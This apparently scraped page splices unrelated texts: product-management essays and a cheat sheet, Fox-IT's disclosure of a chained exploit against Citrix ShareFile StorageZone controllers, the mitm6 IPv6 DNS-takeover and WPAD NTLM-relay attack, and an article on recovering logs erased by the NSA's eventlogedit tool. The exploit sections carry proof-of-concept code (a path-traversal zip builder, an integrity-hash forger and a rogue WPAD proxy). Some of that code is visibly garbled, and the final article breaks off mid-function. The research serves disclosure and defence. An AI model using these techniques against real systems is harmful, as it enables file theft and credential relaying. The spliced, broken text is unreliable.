There are lots of challenges, of course, but every day feels like an adventure, as we fight for a seat at the big kids’ table, grow the customer base and break new ground with innovative anti-malware approaches. It’s a risky environment with high highs and low lows, but it feels like the right place for me right now.

Which Setting is Best for You?

Numerous differences between startups and large companies affect the experience of working in these firms. The distinction is highly pronounced for product managers, who oversee the creation of the solutions sold by these companies. You need to understand these differences prior to deciding which of the environments is best for you, but that’s just a start. Next, understand what is best for you, given where you are in life and your professional development. Sometimes the capabilities that you as a product manager will have in an established firm will be just right; at others, you will thrive in a startup. Work in the environment that appeals to you, but also know when (or whether) it’s time to make a change.

Compromising Citrix ShareFile on-premise via 7 chained vulnerabilities

A while ago we investigated a setup of Citrix ShareFile with an on-premise StorageZone controller. ShareFile is a file sync and sharing solution aimed at enterprises. While there are versions of ShareFile that are fully managed in the cloud, Citrix offers a hybrid version where the data is stored on-premise via StorageZone controllers. This blog describes how Fox-IT identified several vulnerabilities which, chained together, allowed any account to access, from the internet, any file stored within ShareFile. Fox-IT disclosed these vulnerabilities to Citrix, which mitigated them via updates to its cloud platform. The vulnerabilities identified were all present in the StorageZone controller component, and thus cloud-only deployments were not affected. According to Citrix, several Fortune 500 enterprises and organisations in the government, tech, healthcare, banking and critical infrastructure sectors use ShareFile (either fully in the cloud or with an on-premise component).


Gaining initial access

After mapping the application surface and the flows, we decided to investigate the upload flow and the connection between the cloud and on-premise components of ShareFile. There are two main ways to upload files to ShareFile: one based on HTML5 and one based on a Java Applet. In the following examples we are using the Java based uploader. All requests are configured to go through Burp, our go-to tool for assessing web applications.
When an upload is initialized, a request is posted to the ShareFile cloud component, which is hosted at (where name is the name of the company using the solution):

Initialize upload

We can see the request contains information about the upload, among which is the filename, the size (in bytes), the tool used to upload (in this case the Java uploader) and whether we want to unzip the upload (more about that later). The response to this request is as follows:

Initialize upload response

In this response we see two different upload URLs. Both use the URL prefix (which is redacted here) that points to the address of the on-premise StorageZone controller. The cloud component thus generates a URL that is used to upload the files to the on-premise component.

The first URL is the ChunkUri, to which the individual chunks are uploaded. When the file transfer is complete, the FinishUri is used to finalize the upload on the server. In both URLs we see the parameters that we submitted in the request, such as the filename, file size, et cetera. The URLs also contain an uploadid which is used to identify the upload. Lastly we see an h= parameter, followed by a base64-encoded hash. This hash is used to verify that the parameters in the URL have not been modified.

The unzip parameter immediately drew our attention. As visible in the screenshot below, the uploader offers the user the option to automatically extract archives (such as .zip files) when they are uploaded.

Extract feature

A common mistake made when extracting zip files is not correctly validating the path in the zip file. By using a relative path it may be possible to traverse to a different directory than intended by the script. This kind of vulnerability is known as a directory traversal or path traversal.

The following Python code creates a special zip file containing two files, one of which has a relative path.

import zipfile

# the name of the zip file to generate (placeholder name; redacted in the original)
zf = zipfile.ZipFile('', 'w')
# the name of the malicious file that will overwrite the original file (must exist on disk)
fname = 'xxe_oob.xml'
# destination path of the file
zf.write(fname, '../../../../testbestand_fox.tmp')
# random extra file (not required)
# example: dd if=/dev/urandom of=test.file bs=1024 count=600
fname = 'test.file'
zf.write(fname, 'tfile')
zf.close()

When we upload this file to ShareFile, we get the following message:

ERROR: Unhandled exception in upload-threaded-3.aspx - 'Access to the path '\\company.internal\data\testbestand_fox.tmp' is denied.'

This indicates that the StorageZone controller attempted to extract our file to a directory for which we lacked permissions, but also that we were able to change the directory to which the file was extracted. This vulnerability can be used to write user-controlled files to arbitrary directories, provided the StorageZone controller has privileges to write to those directories. Imagine the default extraction path is c:\appdata\citrix\sharefile\temp\ and we want to write to c:\appdata\citrix\sharefile\storage\subdirectory\. We can add a file with the name ../storage/subdirectory/filename.txt, which will then be written to the target directory. The ../ part indicates that the operating system should go one directory higher in the directory tree and use the rest of the path from that location.
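To illustrate how such a relative entry resolves, here is a minimal sketch using Python’s ntpath module to mimic Windows path handling (the paths are the hypothetical examples from above, not the actual ShareFile layout):

```python
import ntpath

# Hypothetical extraction directory and attacker-controlled archive entry
extract_dir = 'c:/appdata/citrix/sharefile/temp'
entry_name = '../storage/subdirectory/filename.txt'

# Naive extraction joins the entry name onto the extraction directory
# without validation; normalizing shows where the file really lands
resolved = ntpath.normpath(ntpath.join(extract_dir, entry_name))
print(resolved)  # c:\appdata\citrix\sharefile\storage\subdirectory\filename.txt
```

A safe extractor would reject any entry whose normalized path escapes the extraction directory.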

Vulnerability 1: Path traversal in archive extraction

From arbitrary write to arbitrary read

While the ability to write arbitrary files to locations within the storage directories is a high-risk vulnerability, the impact of this vulnerability depends on how the files on disk are used by the application and if there are sufficient integrity checks on those files. To determine the full impact of being able to write files to the disk we decided to look at the way the StorageZone controller works. There are three main folders in which interesting data is stored:

  • files
  • persistentstorage
  • tokens

The first folder, files, is used to store temporary data related to uploads. Files already uploaded to ShareFile are stored in the persistentstorage directory. Lastly the tokens folder contains data related to tokens which are used to control the downloads of files.

When a new upload was initialized, the URLs contained a parameter called uploadid. As the name already indicates this is the ID assigned to the upload, in this case it is rsu-2351e6ffe2fc462492d0501414479b95. In the files directory, there are folders for each upload matching with this ID.

In each of these folders there is a file called info.txt, which contains information about our upload:


In the info.txt file we see several parameters that we saw previously, such as the uploadid, the file name, the file size (13 bytes), as well as some parameters that are new. At the end, we see a 32 character long uppercase string, which hints at an integrity hash for the data.
We see two other IDs, fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 and fo9252b1-1f49-4024-aec4-6fe0c27ce1e6, which correspond with the file ID for the upload and folder ID to which the file is uploaded respectively.

After trying to figure out for a while what kind of hashing algorithm was used for the integrity check of this file, it turned out to be a simple MD5 hash of the rest of the data in the info.txt file. The twist is that the data is encoded as UTF-16-LE, the default encoding for Unicode strings in Windows.

Armed with this knowledge we can write a simple Python script which calculates the correct hash over a modified info.txt file and writes it back to disk:

import md5  # Python 2; in Python 3 use hashlib.md5 instead

with open('info_modified.txt', 'r') as infile:
    instr ='|')
instr2 = u'|'.join(instr[:-1])
outhash ='utf-16-le')).hexdigest().upper()
with open('info_out.txt', 'w') as outfile:
    outfile.write('%s|%s' % (instr2, outhash))

Here we find our second vulnerability: the integrity of the info.txt file is not verified using a secret known only to the application; it is merely validated against corruption with an MD5 hash. This gives an attacker who can write to the storage folders the ability to alter the upload information.

Vulnerability 2: Integrity of data files (info.txt) not verified

Since our previous vulnerability enabled us to write files to arbitrary locations, we can upload our own info.txt and thus modify the upload information.
It turns out that when uploading data, the file ID fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 is used as the temporary name for the file. The uploaded data is written to this file, and when the upload is finalized the file is added to the user’s ShareFile account. We are going to attempt another path traversal here. Using the script above, we modify the file ID to a different filename in an attempt to extract a test file called secret.txt, which we placed in the files directory (one directory above the regular location of the temporary file). The (somewhat redacted) info.txt then becomes:

modified info.txt

When we subsequently post to the upload-threaded-3.aspx page to finalize the upload, we are presented with the following descriptive error:

File size does not match

Apparently, the file size of the secret.txt file we are trying to extract is 14 bytes instead of the 13 the modified info.txt indicated. We upload a new info.txt with the correct file size, and the secret.txt file is successfully added to our ShareFile account:

File extraction POC

And thus we’ve successfully exploited a second path traversal, which is in the info.txt file.

Vulnerability 3: Path traversal in info.txt data

By now we’ve turned our ability to write arbitrary files to the system into the ability to read arbitrary files, as long as we do know the filename. It should be noted that all the information in the info.txt file can be found by investigating traffic in the web interface, and thus an attacker does not need to have an info.txt file to perform this attack.

Investigating file downloads

So far, we’ve only looked at uploading new files. The downloading of files is also controlled by the ShareFile cloud component, which instructs the StorageZone controller to serve the requested files. A typical download link looks as follows:

Download URL

Here we see the dt parameter which contains the download token. Additionally there is an h parameter which contains an HMAC of the rest of the URL, to prove to the StorageZone controller that we are authorized to download this file.

The information for the download token is stored in an XML file in the tokens directory. An example file is shown below:

<?xml version="1.0" encoding="utf-8"?>
<ShareFileDownloadInfo authSignature="866f075b373968fcd2ec057c3a92d4332c8f3060" authTimestamp="636343218053146994">
<UserAgent>Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0</UserAgent>
<Item key="operatingsystem" value="Linux" />
<IrmPolicyServerUrl />
<IrmAccessId />
<IrmAccessKey />
<File name="testfile" path="a4ea881a-a4d5-433a-fa44-41acd5ed5a5f\0f\0f\fi0f0f2e_3477_4647_9cdd_e89758c21c37" size="61" id="" />
<ShareID />
</ShareFileDownloadInfo>

Two things are of interest here. The first is the path property of the File element, which specifies the file the token is valid for. The path starts with the ID a4ea881a-a4d5-433a-fa44-41acd5ed5a5f, the ShareFile AccountID, which is unique per ShareFile instance. The second ID, fi0f0f2e_3477_4647_9cdd_e89758c21c37, is unique for the file (hence the fi prefix), with two 0f subdirectories matching the first characters of the ID (presumably to prevent huge folder listings).

The second noteworthy point is the authSignature property on the ShareFileDownloadInfo element. This suggests that the XML is signed to ensure its authenticity, and to prevent malicious tokens from being downloaded.

At this point we started looking at the StorageZone controller software itself. Since it is a .NET program running under IIS, it is trivial to decompile the binaries with tools such as JustDecompile. While we obtained the StorageZone controller binaries from the server the software was running on, Citrix also offers this component as a download on their website.

In the decompiled code, the functions responsible for verifying the token can quickly be found. The feature to have XML files with a signature is called AuthenticatedXml by Citrix. In the code we find that a static key is used to verify the integrity of the XML file (which is the same for all StorageZone controllers):

Static MAC secret

Vulnerability 4: Token XML file integrity not verified

During our research we of course attempted simply editing the XML file without changing the signature, and it turned out that an attacker does not even need to calculate the signature: if it doesn’t match, the application simply tells you what the correct signature should be:

Signature disclosure

Vulnerability 5: Debug information disclosure

Furthermore, when we looked at the code which calculates the signature, it turned out that the signature is computed by prepending the secret to the data and calculating a SHA-1 hash over the result. This makes the signature potentially vulnerable to a hash length extension attack, though we did not verify this in the time available.

Hashing of secret prepended

Even though we didn’t use it in the attack chain, it turned out that the XML files were also vulnerable to XML External Entity (XXE) injection:

XXE error

Vulnerability 6 (not used in the chain): Token XML files vulnerable to XXE

In summary, it turns out that the token files offer another avenue to download arbitrary files from ShareFile. Additionally, the integrity of these files is insufficiently verified to protect against attackers. Unlike the previously described method which altered the upload data, this method will also decrypt encrypted files if encrypted storage is enabled within ShareFile.

Getting tokens and files

At this point we are able to write arbitrary files to any directory we want and to download files if the path is known. The file path however consists of random IDs which cannot be guessed in a realistic timeframe. It is thus still necessary for an attacker to find a method to enumerate the files stored in ShareFile and their corresponding IDs.

For this last step, we go back to the unzip functionality. The code responsible for extracting the zip file is (partially) shown below.

Unzip code

What we see here is that the code creates a temporary directory to which it extracts the files from the archive. The uploadId parameter is used in the name of the temporary directory. Since we do not see any validation of this path taking place, this operation is possibly vulnerable to yet another path traversal. Earlier we saw that the uploadId parameter is submitted in the URL when uploading files, but the URL also contains an HMAC, which seemingly makes modifying this parameter impossible:


However, let’s have a look at the implementation first. The request initially passes through the ValidateRequest function below:

Validation part 1

Which then passes it to the second validation function:

Validation part 2

What happens here is that the h parameter is extracted from the request and used to verify all parameters in the URL that precede it. Thus any parameters following h in the URL are completely unverified!

So what happens when we add another parameter after the HMAC? When we modify the URL as follows:


We get the following message:

{"error":true,"errorMessage":"upload-threaded-2.aspx: ID='rsu-becc299a4b9c421ca024dec2b4de7376,foxtest' Unrecognized Upload ID.","errorCode":605}

So what happens here? Since the uploadid parameter is specified multiple times, IIS concatenates the values, separated with a comma. Only the first uploadid parameter is verified by the HMAC, since the check operates on the query string instead of the individual parameter values, and only covers the portion of the string before the h parameter. This type of vulnerability is known as HTTP Parameter Pollution.
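The behaviour can be illustrated with Python’s query-string parsing (the uploadid values are those from the error message above; the HMAC value is a placeholder, and the comma-joining mimics what IIS’s Request.QueryString does):

```python
from urllib.parse import parse_qs

qs = 'uploadid=rsu-becc299a4b9c421ca024dec2b4de7376&h=PLACEHOLDERHMAC&uploadid=foxtest'

# The HMAC only covers the part of the query string before the h parameter
verified_part = qs.split('&h=')[0]

# IIS concatenates duplicate parameters with a comma when the application
# reads the value, so the second uploadid reaches the application unverified
params = parse_qs(qs)
uploadid_as_seen_by_app = ','.join(params['uploadid'])
print(uploadid_as_seen_by_app)  # rsu-becc299a4b9c421ca024dec2b4de7376,foxtest
```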

Vulnerability 7: Incorrectly implemented URL verification (parameter pollution)

Looking at the upload logic again, the code calls the function UploadLogic.RecursiveIteratePath after the files are extracted to the temporary directory, which recursively adds all the files it can find to the ShareFile account of the attacker (some code was cut for readability):

Recursive iteration

To exploit this, we need to do the following:

  • Create a directory called rsu-becc299a4b9c421ca024dec2b4de7376, in the files directory.
  • Upload an info.txt file to this directory.
  • Create a temporary directory called ulz-rsu-becc299a4b9c421ca024dec2b4de7376,.
  • Perform an upload with an added uploadid parameter pointing us to the tokens directory.

The creation of directories can be performed with the directory traversal that was initially identified in the unzip operation, since this will create any non-existing directories. To perform the final step and exploit the third path traversal, we post the following URL:

Upload ID path traversal

Side note: we use tokens_backup here because we didn’t want to touch the original tokens directory.

Which returns the following result that indicates success:

Upload ID path traversal result

Going back to our ShareFile account, we now have hundreds of XML files with valid download tokens available, which all link to files stored within ShareFile.

Download tokens

Vulnerability 8: Path traversal in upload ID

We can download these files by modifying the path in our own download token files for which we have the authorized download URL.
The only side effect is that adding files to the attacker’s account this way also recursively deletes all files and folders in the temporary directory. By traversing the path to the persistentstorage directory it is thus also possible to delete all files stored in the ShareFile instance.


By abusing a chain of correlated vulnerabilities it was possible for an attacker with any account allowing file uploads to access all files stored by the ShareFile on-premise StorageZone controller.

Based on our research that was performed for a client, Fox-IT reported the following vulnerabilities to Citrix on July 4th 2017:

  1. Path traversal in archive extraction
  2. Integrity of data files (info.txt) not verified
  3. Path traversal in info.txt data
  4. Token XML file integrity not verified
  5. Debug information disclosure (authentication signatures, hashes, file size, network paths)
  6. Token XML files vulnerable to XXE
  7. Incorrectly implemented URL verification (parameter pollution)
  8. Path traversal in upload ID

Citrix was quick to follow up on the issues, rolling out mitigations by disabling the unzip functionality in the cloud component of ShareFile. While Fox-IT identified several major organisations and enterprises that use ShareFile, it is unknown whether they were using the hybrid setup in a vulnerable configuration. Therefore, the number of affected installations, and whether these issues were abused, is unknown.

Disclosure timeline

  • July 4th 2017: Fox-IT reports all vulnerabilities to Citrix
  • July 7th 2017: Citrix confirms they are able to reproduce vulnerability 1
  • July 11th 2017: Citrix confirms they are able to reproduce the majority of the other vulnerabilities
  • July 12th 2017: Citrix deploys an initial mitigation for vulnerability 1, breaking the attack chain. Citrix informs us the remaining findings will be fixed on a later date as defense-in-depth measures
  • October 31st 2017: Citrix deploys additional fixes to the cloud-based ShareFile components
  • April 6th 2018: Disclosure

CVE: To be assigned

Practical Tips for Creating and Managing New Information Technology Products

This cheat sheet offers advice for product managers of new IT solutions at startups and enterprises. To print it, use the one-page PDF version; you can also edit the Word version to customize it for your own needs.

Responsibilities of a Product Manager

  • Determine what to build, not how to build it.
  • Envision the future pertaining to product domain.
  • Align product roadmap to business strategy.
  • Define specifications for solution capabilities.
  • Prioritize feature requirements, defect correction, technical debt work and other development efforts.
  • Help drive product adoption by communicating with customers, partners, peers and internal colleagues.
  • Participate in the handling of issue escalations.
  • Sometimes take on revenue or P&L responsibilities.

Defining Product Capabilities

  • Understand gaps in the existing products within the domain and how customers address them today.
  • Understand your firm’s strengths and weaknesses.
  • Research the strengths and weaknesses of your current and potential competitors.
  • Define the smallest set of requirements for the initial (or next) release (minimum viable product).
  • When defining product requirements, balance long-term strategic needs with short-term tactical ones.
  • Understand your solution’s key benefits and unique value proposition.

Strategic Market Segmentation

  • Market segmentation often accounts for geography, customer size or industry verticals.
  • Devise a way of grouping customers based on the similarities and differences of their needs.
  • Also account for the similarities in your capabilities, such as channel reach or support abilities.
  • Determine which market segments you’re targeting.
  • Understand similarities and differences between the segments in terms of needs and business dynamics.
  • Consider how you’ll reach prospective customers in each market segment.

Engagement with the Sales Team

  • Understand the nature and size of the sales force aligned with your product.
  • Explore the applicability and nature of a reseller channel or OEM partnerships for product growth.
  • Understand sales incentives pertaining to your product and, if applicable, attempt to adjust them.
  • Look for misalignments, such as recurring SaaS product pricing vs. traditional quarterly sales goals.
  • Assess what other products are “competing” for the sales team’s attention, if applicable.
  • Determine the nature of support you can offer the sales team to train or otherwise support their efforts.
  • Gather sales’ negative and positive feedback regarding the product.
  • Understand which market segments and use-cases have gained the most traction in the product’s sales.

The Pricing Model

  • Understand the value that customers in various segments place on your product.
  • Determine your initial costs (software, hardware, personnel, etc.) related to deploying the product.
  • Compute your ongoing costs related to maintaining the product and supporting its users.
  • Decide whether you will charge customers recurring or one-time (plus maintenance) fees for the product.
  • Understand the nature of customers’ budgets, including any CapEx vs. OpEx preferences.
  • Define the approach to offering volume pricing discounts, if applicable.
  • Define the model for compensating the sales team, including resellers, if applicable.
  • Establish the pricing schedule, setting the price based on perceived value.
  • Account for the minimum desired profit margin.

Product Delivery and Operations

  • Understand the intricacies of deploying the solution.
  • Determine the effort required to operate, maintain and support the product on an ongoing basis.
  • Determine the technical steps, personnel, tools, support requirements and the associated costs.
  • Document the expectations and channels of communication between you and the customer.
  • Establish the necessary vendor relationship for product delivery, if necessary.
  • Clarify which party in the relationship has which responsibilities for monitoring, upgrades, etc.
  • Allocate the necessary support, R&D, QA, security and other staff to maintain and evolve the product.
  • Obtain the appropriate audits and certifications.

Product Management at Startups

  • Ability and need to iterate faster to get feedback
  • Willingness and need to take higher risks
  • Lower bureaucratic burden and red tape
  • Much harder to reach customers
  • Often fewer resources to deliver on the roadmap
  • Fluid designation of responsibilities

Product Management at Large Firms

  • An established sales organization, which provides access to customers
  • Potentially-conflicting priorities and incentives with groups and individuals within the organization
  • Rigid organizational structure and bureaucracy
  • Potentially-easier access to funding for sophisticated projects and complex products
  • Possibly-easier access to the needed expertise
  • Well-defined career development roadmap


Authored by Lenny Zeltser, who has been responsible for product management of information security solutions at companies large and small. This cheat sheet, version 1.0, is released under the Creative Commons v3 “Attribution” License.

mitm6 – compromising IPv4 networks via IPv6

While IPv6 adoption is increasing on the internet, company networks that use IPv6 internally are quite rare. However, most companies are unaware that while IPv6 might not be actively in use, all Windows versions since Windows Vista (including server variants) have IPv6 enabled and prefer it over IPv4. In this blog, an attack is presented that abuses the default IPv6 configuration in Windows networks to spoof DNS replies by acting as a malicious DNS server, redirecting traffic to an attacker-specified endpoint. In the second phase of this attack, a new method is outlined to exploit the (infamous) Windows Proxy Auto Discovery (WPAD) feature in order to relay credentials and authenticate to various services within the network. The tool Fox-IT created for this is called mitm6, and is available from the Fox-IT GitHub.

IPv6 attacks

Similar to the slow IPv6 adoption, resources about abusing IPv6 are much less prevalent than those describing IPv4 pentesting techniques. While every book and course mentions things such as ARP spoofing, IPv6 is rarely touched on, and the tools available to test or abuse IPv6 configurations are limited. The THC IPV6 Attack Toolkit is one of the available tools, and was an inspiration for mitm6. The attack described in this blog is a partial version of the SLAAC attack, which was first described in 2011 by Alex Waters from the Infosec Institute. The SLAAC attack sets up various services to man-in-the-middle all traffic in the network via a rogue IPv6 router. The setup of this attack was later automated with a tool by Neohapsis called suddensix.

The downside of the SLAAC attack is that it attempts to create an IPv6 overlay network over the existing IPv4 network for all devices present. This is hardly a desired situation in a penetration test, since it rapidly destabilizes the network. Additionally, the attack requires quite a few external packages and services to work. mitm6 focuses on an easy-to-set-up solution that selectively attacks hosts and spoofs DNS replies, while minimizing the impact on the network’s regular operation. The result is a Python script which requires almost no configuration, and gets the attack running in seconds. When the attack is stopped, the network reverts to its previous state within minutes thanks to the tweaked timeouts set in the tool.

The mitm6 attack

Attack phase 1 – Primary DNS takeover

mitm6 starts by listening on the primary interface of the attacker machine for Windows clients requesting an IPv6 configuration via DHCPv6. By default, every Windows machine since Windows Vista will request this configuration regularly. This can be seen in a packet capture from Wireshark:


mitm6 will reply to those DHCPv6 requests, assigning the victim an IPv6 address within the link-local range. While in an actual IPv6 network these addresses are auto-assigned by the hosts themselves and do not need to be configured by a DHCP server, this gives us the opportunity to set the attacker’s IP as the default IPv6 DNS server for the victims. It should be noted that mitm6 currently only targets Windows-based operating systems, since other operating systems like macOS and Linux do not use DHCPv6 for DNS server assignment.

mitm6 does not advertise itself as a gateway, and thus hosts will not actually attempt to communicate with IPv6 hosts outside their local network segment or VLAN. This limits the impact on the network as mitm6 does not attempt to man-in-the-middle all traffic in the network, but instead selectively spoofs hosts (the domain which is filtered on can be specified when running mitm6).

The screenshot below shows mitm6 in action. The tool automatically detects the IP configuration of the attacker machine and replies to DHCPv6 requests sent by clients in the network with a DHCPv6 reply containing the attacker’s IP as DNS server. Optionally, it will periodically send Router Advertisement (RA) messages to alert clients that there is an IPv6 network in place and that they should request an IPv6 address via DHCPv6. This will in some cases speed up the attack, but is not required for the attack to work, making it possible to execute this attack on networks that protect against the SLAAC attack with features such as RA Guard.


Attack phase 2 – DNS spoofing

On the victim machine we see that our server is configured as the DNS server. Due to Windows’ preference regarding IP protocols, the IPv6 DNS server will be preferred over the IPv4 DNS server. The IPv6 DNS server will be used to query for both A (IPv4) and AAAA (IPv6) records.


Now our next step is to get clients to connect to the attacker machine instead of the legitimate servers. Our end goal is getting the user or browser to automatically authenticate to the attacker machine, which is why we are spoofing URLs in the internal domain testsegment.local. On the screenshot in step 1 you see the client started requesting information about wpad.testsegment.local immediately after it was assigned an IPv6 address. This is the part we will be exploiting during this attack.

Exploiting WPAD

A (short) history of WPAD abuse

The Windows Proxy Auto Detection feature has been a much-debated one, and one that has been abused by penetration testers for years. Its legitimate use is to automatically detect a network proxy used for connecting to the internet in corporate environments. Historically, the address of the server providing the wpad.dat file (which provides this information) would be resolved using DNS, and if no entry was returned, the address would be resolved via insecure broadcast protocols such as Link-Local Multicast Name Resolution (LLMNR). An attacker could reply to these broadcast name resolution protocols, pretend the WPAD file was located on the attacker’s server, and then prompt for authentication to access the WPAD file. This authentication was provided by default by Windows without requiring user interaction. This could provide the attacker with the NTLM credentials of the user logged in on that computer, which could be used to authenticate to services in a process called NTLM relaying.

In 2016, however, Microsoft published security bulletin MS16-077, which mitigated this attack by adding two important protections:
– The location of the WPAD file is no longer requested via broadcast protocols, but only via DNS.
– Authentication does not occur automatically anymore even if this is requested by the server.

While it is common to encounter machines in networks that are not fully patched and are still displaying the old behaviour of requesting WPAD via LLMNR and automatically authenticating, we come across more and more companies where exploiting WPAD the old-fashioned way does not work anymore.

Exploiting WPAD post MS16-077

The first protection, where WPAD is only requested via DNS, can be easily bypassed with mitm6. As soon as the victim machine has set the attacker as IPv6 DNS server, it will start querying for the WPAD configuration of the network. Since these DNS queries are sent to the attacker, it can just reply with its own IP address (either IPv4 or IPv6, depending on what the victim’s machine asks for). This also works if the organization is already using a WPAD file (though in this case it will prevent those connections from reaching the internet).

To bypass the second protection, where credentials are no longer provided by default, we need to do a little more work. When the victim requests a WPAD file, we won’t request authentication, but instead provide it with a valid WPAD file in which the attacker’s machine is set as a proxy. When the victim then runs any application that uses the Windows API to connect to the internet, or simply starts browsing the web, it will use the attacker’s machine as a proxy. This works in Edge, Internet Explorer, Firefox and Chrome, since they all respect the WPAD system settings by default.
Now when the victim connects to our “proxy” server, which we can identify by the use of the CONNECT HTTP verb or the presence of a full URI after the GET verb, we reply with an HTTP 407 Proxy Authentication Required. This differs from the HTTP code normally used to request authentication, HTTP 401.
IE/Edge and Chrome (which uses IE’s settings) will automatically authenticate to the proxy, even on the latest Windows versions. In Firefox this setting can be configured, but it is enabled by default.
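The proxy interaction described above can be sketched with Python’s standard http.server module: serve a valid WPAD file naming ourselves as proxy, and answer proxied requests with a 407 offering NTLM. Everything below (addresses, port, handler behavior) is an illustrative toy, not the actual ntlmrelayx implementation:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Illustrative values, not taken from ntlmrelayx.
ATTACKER_HOST = "10.0.0.5"
PROXY_PORT = 8080

# PAC file naming the attacker's machine as proxy for all URLs.
WPAD_TEMPLATE = (
    'function FindProxyForURL(url, host) {\n'
    '  return "PROXY %s:%d";\n'
    '}\n'
) % (ATTACKER_HOST, PROXY_PORT)

class RogueProxyHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path.endswith("wpad.dat"):
            # Hand out a valid WPAD file without asking for authentication.
            body = WPAD_TEMPLATE.encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/x-ns-proxy-autoconfig")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
        elif self.path.startswith("http://"):
            # A full URI after GET means the client is using us as a proxy:
            # demand proxy authentication (407, not the usual 401).
            self.send_response(407)
            self.send_header("Proxy-Authenticate", "NTLM")
            self.end_headers()

    def do_CONNECT(self):
        # CONNECT is the other giveaway of proxied (HTTPS) traffic.
        self.send_response(407)
        self.send_header("Proxy-Authenticate", "NTLM")
        self.end_headers()

# To run the sketch: HTTPServer(("", PROXY_PORT), RogueProxyHandler).serve_forever()
```

The two branches mirror the two identification tricks mentioned above: a CONNECT verb or a full URI after GET marks proxied traffic, and only that traffic is challenged for proxy authentication.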


Windows will now happily send the NTLM challenge/response to the attacker, who can relay it to different services. With this relaying attack, the attacker can authenticate as the victim to services, access information on websites and shares, and, if the victim has enough privileges, even execute code on computers or take over the entire Windows domain. Some of the possibilities of NTLM relaying were explained in one of our previous blogs, which can be found here.

The full attack

The previous sections described the global idea behind the attack. Running the attack itself is quite straightforward. First we start mitm6, which will start replying to DHCPv6 requests and afterwards to DNS queries requesting names in the internal network. For the second part of our attack, we use our favorite relaying tool, ntlmrelayx. This tool is part of the impacket Python library by Core Security and is an improvement on the well-known smbrelayx tool, supporting several protocols to relay to. Core Security and Fox-IT recently worked together on improving ntlmrelayx, adding several new features which (among others) enable it to relay via IPv6, serve the WPAD file, automatically detect proxy requests and prompt the victim for the correct authentication. If you want to check out some of the new features, have a look at the relay-experimental branch.

To serve the WPAD file, all we need to add to the command is the -wh parameter, specifying the host that the WPAD file resides on. Since mitm6 gives us control over the DNS, any non-existent hostname in the victim network will do. To make sure ntlmrelayx listens on both IPv4 and IPv6, use the -6 parameter. The screenshots below show both tools in action: mitm6 selectively spoofing DNS replies, and ntlmrelayx serving the WPAD file and then relaying authentication to other servers in the network.


Defenses and mitigations

The only defense against this attack that we are currently aware of is disabling IPv6 if it is not used on your internal network. This will stop Windows clients querying for a DHCPv6 server and make it impossible to take over the DNS server with the method described above.
For the WPAD exploit, the best solution is to disable Proxy Auto Detection via Group Policy. If your company uses a proxy configuration file internally (a PAC file), it is recommended to explicitly configure the PAC URL instead of relying on WPAD to detect it automatically.
While writing this blog, Google Project Zero also discovered vulnerabilities in WPAD. Their blog post mentions that disabling the WinHttpAutoProxySvc service is, in their experience, the only reliable way to disable WPAD.

Lastly, the only complete solution to prevent NTLM relaying is to disable it entirely and switch to Kerberos. If this is not possible, our last blog post on NTLM relaying mentions several mitigations to minimize the risk of relaying attacks.


The Fox-IT Security Research Team has released Snort and Suricata signatures to detect rogue DHCPv6 traffic and WPAD replies over IPv6:

Where to get the tools

mitm6 is available from the Fox-IT GitHub. The updated version of ntlmrelayx is available from the impacket repository.

Detection and recovery of NSA’s covered up tracks

Part of the NSA cyber weapon framework DanderSpritz is eventlogedit, a piece of software capable of removing individual lines from Windows Event Log files. Now that this tool has been leaked and made public, any criminal can use it to remove their traces on a hacked computer. Fox-IT has looked at the software and found a unique way to detect its use and to recover the removed event log entries.


A group known as The Shadow Brokers published a collection of software, which allegedly was part of the cyber weapon arsenal of the NSA. Part of the published software was the exploitation framework FuzzBunch and post-exploitation framework DanderSpritz. DanderSpritz is a full-blown command and control server, or “listening post” in NSA terms. It can be used to stealthily perform various actions on hacked computers, like finding and exfiltrating data or moving laterally through the target network. Its GUI is built on Java and it contains plugins written in Python. The plugins contain functionality in the framework to perform specific actions on the target machine. One specific plugin in DanderSpritz caught the eye of the Forensics & Incident Response team at Fox-IT: eventlogedit.

DanderSpritz with eventlogedit in action

Figure 1: DanderSpritz with eventlogedit in action


Normally, the content of Windows Event Log files is useful for system administrators troubleshooting system performance, security teams monitoring for incidents, and forensic and incident response teams investigating a breach or fraud case. A single event record can alert the security team or be the smoking gun during an investigation. Various other artefacts found on the target system usually corroborate findings in Windows Event Log files during an investigation, but a missing event record could reduce the chances of detection of an attack, or impede investigation.

Fox-IT has encountered event log editing by attackers before, but eventlogedit appeared to be more sophisticated. Investigative methods able to spot other forms of event log manipulation showed no indicators of edited log files after the use of eventlogedit. Using eventlogedit, an attacker is able to remove individual event log entries from the Security, Application and System logs on a target Windows system. After forensic analysis of systems where eventlogedit was used, the Forensics & Incident Response team of Fox-IT was able to create a Python script to detect the use of eventlogedit and fully recover the event log entries removed by the attacker.

Analysing recovered event records, deleted by an attacker, gives great insight into what an attacker wanted to hide and ultimately wanted to achieve. This provides security and response teams with more prevention and detection possibilities, and investigative leads during an investigation.

Before (back) and after (front) eventlogedit

Figure 2: Before (back) and after (front) eventlogedit

eventlogedit in use

Starting with Windows Vista, Windows Event Log files are stored in the Windows XML Eventlog format. The files on the disk have the file extension .evtx and are stored in the folder \Windows\System32\winevt\Logs\ on the system disk, by default. The file structure consists of a file header followed by one or more chunks. A chunk itself starts with a header followed by one or more individual event records. The event record starts with a signature, followed by record size, record number, timestamp, the actual event message, and the record size once again. The event message is encoded in a proprietary binary XML format, binXml. BinXml is a token representation of text XML.
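The record layout just described can be expressed with a few lines of Python’s struct module. This is a simplified sketch following the public EVTX format documentation, not a full parser: the binXml payload is treated as opaque bytes, and make_record builds a synthetic record purely for illustration.

```python
import struct

RECORD_MAGIC = b"\x2a\x2a\x00\x00"  # event record signature
HEADER_LEN = 4 + 4 + 8 + 8          # signature, size, record number, timestamp

def make_record(number, payload):
    """Build a synthetic record for illustration: header, a stand-in for
    the binXml event message, and the record size repeated at the end."""
    size = HEADER_LEN + len(payload) + 4
    return (RECORD_MAGIC + struct.pack("<IQQ", size, number, 0)
            + payload + struct.pack("<I", size))

def parse_record_header(buf, offset=0):
    """Parse one event record header at the given offset."""
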